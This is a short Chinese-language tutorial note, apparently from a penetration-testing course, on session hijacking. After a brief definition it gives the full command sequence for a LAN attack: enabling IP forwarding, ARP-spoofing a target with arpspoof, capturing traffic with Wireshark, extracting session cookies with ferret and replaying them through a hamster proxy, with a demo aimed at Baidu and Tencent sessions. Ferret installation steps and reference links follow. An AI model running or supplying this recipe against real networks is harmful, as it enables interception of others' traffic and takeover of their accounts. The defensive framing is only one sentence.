#会话劫持(Session hijacking):
[v1 54tian]
这是一种通过获取用户Session ID后,使用该Session ID登录目标账号的攻击方法,此时攻击者实际上是使用了目标账户的有效Session。会话劫持的第一步是取得一个合法的会话标识来伪装成合法用户,因此需要保证会话标识不被泄漏。
#原理再次说明
#案例演示:内网会话劫持(百度,腾讯等信息)
#相关操作命令:
echo 1 >/proc/sys/net/ipv4/ip_forward
arpspoof -i 网卡接口(eth0) -t 目标机IP 网关IP //欺骗目标机器
wireshark 抓包并导出pacp格式
ferret -r xxx.pacp(上一步生成的文件)
将生成的hamster.txt放置/root目录
hamster运行后设置本地浏览器代理
#关于ferret安装:
0.先添加源
leafpad /etc/apt/sources.list
https://blog.csdn.net/qq_34450601/article/details/80009095
1.添加对32位的支持
sudo dpkg --add-architecture i386
2.更新
sudo apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y
3.安装ferret
sudo apt-get install aptitude
sudo aptitude install ferret-sidejack:i386
https://www.secpulse.com/archives/32859.html
https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools
http://app.myzaker.com/news/article.php?pk=5ba076fb77ac645c1d2e49c2